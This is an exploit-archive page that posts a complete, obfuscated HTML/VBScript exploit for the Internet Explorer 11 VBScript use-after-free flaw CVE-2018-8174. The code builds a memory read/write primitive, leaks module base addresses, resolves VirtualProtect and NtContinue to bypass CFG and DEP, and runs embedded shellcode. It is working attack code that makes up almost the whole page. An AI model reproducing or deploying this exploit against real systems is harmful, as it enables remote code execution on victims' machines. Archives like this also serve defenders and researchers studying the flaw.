exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Internet Explorer 11 Vbscript Code Execution

Microsoft Internet Explorer 11 Vbscript Code Execution
Posted May 24, 2018
Authored by smgorelik

Microsoft Internet Explorer 11 on Windows 7 x64/x86 suffers from a vbscript code execution vulnerability.

tags | exploit, x86, code execution
systems | windows
advisories | CVE-2018-8174
SHA-256 | 5ea819396cd5fb910aa32e5974bd278e3661029f3b11021d68c0ae940bbf7285

Microsoft Internet Explorer 11 Vbscript Code Execution

Change Mirror Download
<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
</head>
<body>
<script language="vbscript">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr

IlII=195948557
lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
IllI=195890093
Function IIIII(Domain)
lIlII=0
IllllI=0
IIlIIl=0
Id=CLng(Rnd*1000000)
lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
lIlII=lIlII-(&h86d+6447-&H219b)
End If

IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
End Function

Function lIIII(ByVal lIlIl)
IIll=""
For index=0 To Len(lIlIl)-1
IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
Next
IIll=IIll &"00"
If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
IIll=IIll &"00"
End If
For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
lIIII=lIIII &"%u" &lIlIll &lIIIlI
Next
End Function
Function lIlI(ByVal Number,ByVal Length)
IIII=Hex(Number)
If Len(IIII)<Length Then
IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros
Else
IIII=Right(IIII,Length)
End If
lIlI=IIII
End Function
Function GetUint32(lIII)
Dim value
llll.mem(IlII+8)=lIII+4
llll.mem(IlII)=8 'type string
value=llll.P0123456789
llll.mem(IlII)=2
GetUint32=value
End Function
Function IllIIl(lIII)
IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
lllII=GetUint32(lIII) And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
llll.mem(IlII)=(&h713+3616-&H1530)
GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
On Error Resume Next
Dim lllll
lllll=llllll
lllll=null
SetMemValue lllll
LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
Dim llIl
llIl=IllIll And &hffff0000
Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
llIl=llIl-65536
Loop
GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
Dim lIIlI,IIIl
lIIlI=""
For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
Next
StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
Dim import_rva,nt_header,descriptor,import_dir
Dim IIIIII
nt_header=GetUint32(base_address+(&h3c))
import_rva=GetUint32(base_address+nt_header+&h80)
import_dir=base_address+import_rva
descriptor=0
Do While True
Dim Name
Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
If Name=0 Then
GetBaseFromImport=&hBAAD0000
Exit Function
Else
If StrCompWrapper(base_address+Name,name_input)=0 Then
Exit Do
End If
End If
descriptor=descriptor+1
Loop
IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function

Function GetProcAddr(dll_base,name)
Dim p,export_dir,index
Dim function_rvas,function_names,function_ordin
Dim Illlll
p=GetUint32(dll_base+&h3c)
p=GetUint32(dll_base+p+&h78)
export_dir=dll_base+p

function_rvas=dll_base+GetUint32(export_dir+&h1c)
function_names=dll_base+GetUint32(export_dir+&h20)
function_ordin=dll_base+GetUint32(export_dir+&h24)
index=0
Do While True
Dim lllI
lllI=GetUint32(function_names+index*4)
If StrCompWrapper(dll_base+lllI,name)=0 Then
Exit Do
End If
index=index+1
Loop
Illlll=IllIIl(function_ordin+index*2)
p=GetUint32(function_rvas+Illlll*4)
GetProcAddr=dll_base+p
End Function

Function GetShellcode()
IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100%u0065%u0000%u0000%u0000%u0000%u0000%ucc00%ucccc%ucccc%ucccc%ucccc" &lIIII(IIIII("")))
IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
Dim High,Low
High=lIlI((value And &hffff0000)/&h10000,4)
Low=lIlI(value And &hffff,4)
EscapeAddress=Unescape("%u" &Low &"%u" &High)
End Function
Function lIllIl
Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
IlllI=lIlI(NtContinueAddr,8)
IlIII=Mid(IlllI,1,2)
llllI=Mid(IlllI,3,2)
llIII=Mid(IlllI,5,2)
lIllI=Mid(IlllI,7,2)
IIlI=""
IIlI=IIlI &"%u0000%u" &lIllI &"00"
For IIIl=1 To 3
IIlI=IIlI &"%u" &llllI &llIII
IIlI=IIlI &"%u" &lIllI &IlIII
Next
IIlI=IIlI &"%u" &llllI &llIII
IIlI=IIlI &"%u00" &IlIII
lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
Dim IIlI
IIlI=String((100334-65536),Unescape("%u4141"))
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(&h3000)
IIlI=IIlI &EscapeAddress(&h40)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
IIlI=IIlI &String(6,Unescape("%u4242"))
IIlI=IIlI &lIllIl()
IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
Dim IIlI
Dim lllllI
lllllI=lIlll+&h23
IIlI=""
IIlI=IIlI &EscapeAddress(lllllI)
IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
IIlI=IIlI &EscapeAddress(&h1b)
IIlI=IIlI &EscapeAddress(0)
IIlI=IIlI &EscapeAddress(lIlll)
IIlI=IIlI &EscapeAddress(&h23)
IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
llll.mem(IlII)=&h4d 'DEP bypass
llll.mem(IlII+8)=0
msgbox(IlII) 'VT replaced
End Sub

Class cla1
Private Sub Class_Terminate()
Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
IllI=IllI+(&h14b5+2725-&H1f59)
lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub

End Class

Class cla2
Private Sub Class_Terminate()
Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
IllI=IllI+(&h880+542-&Ha9d)
lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class

Class IIIlIl
End Class

Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class

Class IIIlll
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class

Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
Set IIIlI(IIIl)=llII
Next
End Property
End Class

Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
Set IllII(IIIl)=llII
Next
End Property
End Class

Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
Set IIllI(IIIl)=New IIIlIl
Next
For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
Set IIllI(IIIl)=New llIIl
Next
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla1
Erase lIIl
Next
Set llll=New llIIl
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla2
Erase lIIl
Next
Set IIIIl=New llIIl
End Sub
Sub InitObjects
llll.SetProp(llllIl)
IIIIl.SetProp(IlIIII)
IlII=IIIIl.mem
End Sub

Sub StartExploit
UAF
InitObjects
vb_adrr=LeakVBAddr()
Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
Alert "VBScript Base: 0x" & Hex(vbs_base)
msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
Alert "MSVCRT Base: 0x" & Hex(msv_base)
krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
Alert "KernelBase Base: 0x" & Hex(krb_base)
ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
Alert "Ntdll Base: 0x" & Hex(ntd_base)
VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr)
NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr)
SetMemValue GetShellcode()
ShellcodeAddr=GetMemValue()+8
Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
lIlll=GetMemValue()+69596
SetMemValue ExpandWithVirtualProtect(lIlll)
llIIll=GetMemValue()
Alert "Executing Shellcode"
ExecuteShellcode
End Sub
StartExploit
</script>
</body>
</html>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close